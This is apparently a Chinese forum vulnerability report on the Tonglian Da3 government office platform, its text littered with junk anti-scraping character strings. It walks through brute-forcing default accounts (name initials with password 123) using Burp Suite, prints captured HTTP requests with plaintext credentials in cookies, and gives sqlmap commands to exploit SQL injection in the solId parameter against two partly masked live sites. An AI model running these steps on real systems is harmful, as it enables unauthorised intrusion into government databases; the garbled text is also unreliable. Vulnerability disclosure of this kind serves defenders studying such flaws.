|
% e# q' c8 b/ X2 D( y" _
5 p! S4 l: k ]0 Q7 U! _. E
$ x" N' K$ a6 c. H' ]5 }
; v z- d( S7 i- c- z4 [ 平台简介:/ F; X. J& E* t( }! {
|) j: P! [( y8 l# o- W
7 ^6 f* w: O* Y ) w# {4 n- J* M, `, N; s4 O
: [& ?) u4 E [6 t+ z s% m) _; m+ ^9 S* c
北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
6 J! _7 Z; ]% t4 Y5 K4 P# m同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。 7 B/ w% j7 O, [% n
同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!8 k: ^1 G+ T1 u3 @5 T
- d6 H% \# I9 x1 B# `1 [, k) [" h6 j m0 w
J/ r% P0 D) W# `
X$ T4 c! S. n' o+ t" V& T2 W1 e( ]. i% f# G' |$ c; v
由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:
6 n2 o% @, O3 l* I1 s: H * i s$ ?8 C6 j& f$ W
. X/ m% Y% F+ l" M$ Q9 [
8 R: ~$ ]2 u% X: [- f; {+ b. Y9 c
0 n! u+ m+ s7 O8 G- ]
- _9 b( i# ?8 `+ F2 @5 w2 s http://1.1.1.1:7197/cap-aco/#(案例2-) L( |( ^" l& K9 l4 p
) n1 [! T8 o( r: L: r3 G
( u# X B. L4 ^2 o6 k http://www.XXOO.com (案例1-官网网站); c s6 T9 O1 `: s
/ l* w. M) A5 J) A# r0 V% f8 `
4 A5 S2 r5 x3 |) Z : Q' D1 P7 m( i, ?$ x. @3 S
; L# l e' k. ?4 A0 q$ `+ M
! a6 [& f, z0 X! _' ]" V 漏洞详情:5 J( N' m0 I4 u- w7 P \
' w6 P( j2 N3 w C% T: J4 J9 n
. i, h1 K1 A7 Q
初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试5 J% p1 ]+ g5 c3 M9 `
8 t4 E- q/ _5 _( X8 B4 X( O# k* v% L( r0 V$ N: A9 _- F4 ]
首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:
" Q% L) R$ Z, j7 q& \5 a $ g3 b i4 R) l! Y6 i" l
/ V" J0 T+ \: O2 P9 r 5 j% y1 B, T* o5 F L
# r) O6 ~7 e9 v" T: n0 Y# G: k9 ~" E
: V7 W6 {; x" p' A7 L: U" d3 n * A) d1 m! d" ]2 t
' ~' ?0 n( s+ u }4 X1 }) f
status为302即表示破解成功,然后找个破解成功的账号登录系统。经过长时间的手工测试发现在发文管理模块抓包,抓包的数据分别如下:
: G: @7 W" D9 p ' G. l' C, v$ n( J! n+ N
/ `1 R" `4 u$ _- ~4 f( A 1、案例1-官方网站
" ?& l X* S5 z+ E- i; l, M 7 x: i; [+ p! V z& `
$ C( ?' G' h# T& j& x6 V
GET /bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=42b0234e-d5dc-402d-9cef-1ce38cbae480&state=&title=1111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510060789826 HTTP/1.1- y/ k, K' t6 u: Z
- D+ e# t2 j1 b" O H% n- k. |: b9 Y. m* S" q
Host: www.XXOO.com, d8 [" X7 S+ W, q* m! ]
$ S$ F0 {6 ]/ N7 Y& ?% m
, B: h3 g0 s z8 T/ s- X% o( {
Proxy-Connection: Keep-Alive; G6 g4 q) a7 Q' Z6 ~& k' h
7 m% I [, R* s# V* u" \6 Z6 r( _( f" R6 D
Accept: application/json, text/javascript, */*; q=0.01 F7 a6 s7 C" k- x4 J$ {; b0 V
: [0 q5 a# A2 w/ M" U. o
6 d2 i. k: ?& n8 K/ w
Accept-Language: zh-CN" R& T5 Q: \ K- Z
z2 f) y& h: U
1 b" J# K, a1 Q: `. M# ?9 q" V: m Content-Type: application/json
( N- s2 l- v& A. B' T4 p$ P
0 B% M" i7 c+ s& K! X6 {* D7 L4 N: o2 U6 h
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0; SE 2.X MetaSr 1.0) like Gecko
) f; R: z$ W6 {! { 9 v6 z E# P1 R2 i
0 t2 V" q( U* \& k E$ F. j2 t2 F X-Requested-With: XMLHttpRequest& {. G) q( r2 Q6 @4 F+ I) m
% h6 Y5 R& D1 j) q2 P
' N0 [: L$ Z2 C$ K$ ]6 D Referer: http://www.XXOO.com/bizRunContro ... 80?modCode=1008M002
5 d3 n |: p- N" C5 Q
5 A/ W, o) |/ e
8 ?( V% ~+ k/ j/ ~ Accept-Encoding: gzip, deflate, sdch; K; Q. q# p# i6 Y- u( m. J
9 P6 p O9 I; b6 G8 |3 @6 d D# D! q3 p3 U$ G
Cookie: username=chm; password=123; rememberme=1; autoSubmit=1; sid=2cf5142f-6c1e-4cbb-89d8-2ebd08438b2e, @$ A' H: f: F2 q
1 H) m+ g1 Y1 R
( J* T- Z. ]4 N) j6 g' X1 e
将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r tl.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:2 z/ ~7 c# r3 L( E2 r
8 T L P( P( ?0 W. J
9 {, c2 L8 q* o! ?/ `
& t6 ^5 w2 v9 M' v ; {6 @& U5 s1 w" w7 c
5 A* \# }0 h& Y1 ?1 | ^8 [/ [$ E) C5 Q
$ {) Z+ u+ f- C- b8 u
+ k! Q7 I/ X9 Z% g! {- Y* ~
8 O+ i8 M4 S7 l* p/ ]$ e' S. D 1 x8 ~, V- e3 t( F7 B* w u3 d
" m2 g5 r' C* D% l# T. d
- Z s. P+ S) P7 p9 } i # ~/ `6 i, k; Q+ Y1 \
- p2 e& s7 T: e$ f1 ]8 I * l! q2 F& w; ^6 I2 Y
% b! z v$ o$ \; N& \* C$ Z! ~0 j' u$ d5 J/ T1 X" ^- w9 t
2、案例2-某天河云平台
* ]" g3 }, ^% f 1 P( n) @* E: @# f
; J$ }+ h9 t* r& e# \. I5 P: a
GET /cap-aco/bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=af056885-4ae5-4e0b-8a0d-c413a786f2db&state=&title=11111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510047738662 HTTP/1.1 N$ t, _, t7 M/ s) K f$ i
' i& I7 C- k# Q, O7 R7 [7 O( y6 D
: N$ P5 f( r9 Y9 b+ ~- l' d; n4 u Host: 1.1.1.:7197
$ P/ S# a7 y5 ]# x, _: t
' K4 U% y$ q+ B) p6 n
' J8 W- Q* ?' x# ^; W Accept: application/json, text/javascript, */*; q=0.01: ^* q; G O# H% |9 d1 v
3 k6 V. c; ]( l
$ G& H1 E: I- J$ z" \2 W, \& a
X-Requested-With: XMLHttpRequest
/ d/ C$ c' T, G& c+ G6 a6 Q
7 b" x! B2 j! x2 q" ~0 z& e
; p( S# l8 U2 ` User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0
4 z0 _( H$ E+ h 7 `5 C* j3 S/ x+ s0 T
; e# Z* ^$ V( r4 Y; k
Content-Type: application/json
' b. s& `$ d- M" M1 d! J
4 g7 L$ q; s4 C. d, R1 R; x! b) F3 Q; Y! P( P8 x$ u
Referer: http://1.1.1.1:7197/cap-aco/bizR ... 86f2db?modCode=1008
7 {5 n+ Z* V- C& F5 ]
1 E1 p% X( y. X9 H8 L, y$ {- O6 p$ A
Accept-Language: zh-CN,zh;q=0.8
& n2 o9 @6 ?1 x ; e9 T% W# T9 D* ?; Z+ v
. i0 w# }! ~/ \' \4 {' p
Cookie: autoSubmit=1; sid=4e333ec9-d194-456b-bb08-4ff64c6eb1fc; username=lxr; password=123; rememberme=1; autoSubmit=1
' q! U+ w: k+ G
1 E; s6 A+ X+ y4 q* d+ e% {! T( v' K3 S. k: m, x4 f) |
Connection: close
3 b1 t5 y+ \* Z6 L8 F- S% t; H , L6 j' i0 K5 Q5 G
9 b& ?9 [' a/ {6 l$ c/ _* Y! } 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r 1.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:2 ~) z. Q1 U7 T; P2 g5 n) `
& V* a$ K% D3 R$ y
6 @; O$ N- J3 m/ o. o1 s
% O% ~* e! g: Y" Z : O$ U- f& s5 Y. A7 b6 t
- l" e% N% `( ?( H! k3 ?5 W
0 \* g1 K% \. h% t3 ? |